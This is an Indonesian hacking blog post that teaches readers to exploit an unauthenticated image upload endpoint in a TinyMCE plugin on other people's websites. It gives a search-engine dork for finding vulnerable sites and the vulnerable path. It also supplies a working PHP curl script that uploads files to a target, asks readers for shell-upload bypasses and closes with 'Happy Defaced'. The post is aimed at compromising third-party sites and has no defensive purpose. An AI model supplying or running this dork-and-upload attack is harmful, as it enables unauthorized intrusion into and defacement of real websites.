Lompat ke konten Lompat ke sidebar Lompat ke footer

eXploit Tinymce Images File Upload Vulnerability

Mau sampai kapan ?!

Hello World ; Malam Fans, Please Say Hello Haters :*
xixixhi, Nuenomaru disini, Sekarang Nue akan Share Tutorial eXploit Tinymce Images File Upload Vulnerable

xixixhi yoii masih seputar Bug/Celah pada TinyMCE, baca juga Tutorial eXploit TinyMCE Ajax File Manager RCE
xixihi, ini tutorial Nue dapet dari Blog Official Marsel *tengkyu artikel tutorialnya.


Langsung intip tutorialnya :*


Dork : 
inurl:/imgupload/ fileuploader.php
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)


1. Dorking di search Engine

2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya.

exploit: /[path]
/extlib/tinymce/plugins/imgupload/fileuploader.php


3. Vulnerability ~ {"error":"No files were uploaded."}


kurang lebihnya sih kek gitu <(")

4. Buat File Baru Berekstensi .php Contoh tinymce.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan taruh juga gambar/file yg ingin di upload sobat di directory yang sama dgn tinymce.php tadi

<?php
$uploadfile="namagambar.jpg";
$ch = curl_init("www.target.co.li/[path]/extlib/tinymce/plugins/imgupload/fileuploader.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

5. Buka Xampp kalian yang sudah terinstall, nyalakan apace sama mysql nya
6. Buka CMD dan ketikan perintah
cd C:/xampp/php
php namaexploitlo.php


7. jika sukses , akan muncul nama file sobat di CMD,dan akan keluar lengkap link akses file ente




Langsung cek awkwakaw



Note: File ekstensi hanya bisa: JPG, JPEG, PDF , GIF, PNG, TIF, TIFF , BMP


Ouhiya awkkwak, kalo ada yang berhasil Bypass Shell nya utk exploit ini,, kirim tutorialnya ke fanspage kami yah awkwak >.< ..
nanti akan kami posting disini, dgn anda sebagai author tutorialnya ^_^

xixihi tengkyu sebelumnya :*


Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy Defaced~
Sekian dan semoga bermanfaat .. terimakasih



source and thanks to:Official Marsel | Phantom Ghost | Sulawesi IT Sec


./Nuenomaru





bakar dlu Nikotinnya, seruput lagi Caffeine nya ^_^
#enjoyed














Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Posting Komentar untuk "eXploit Tinymce Images File Upload Vulnerability"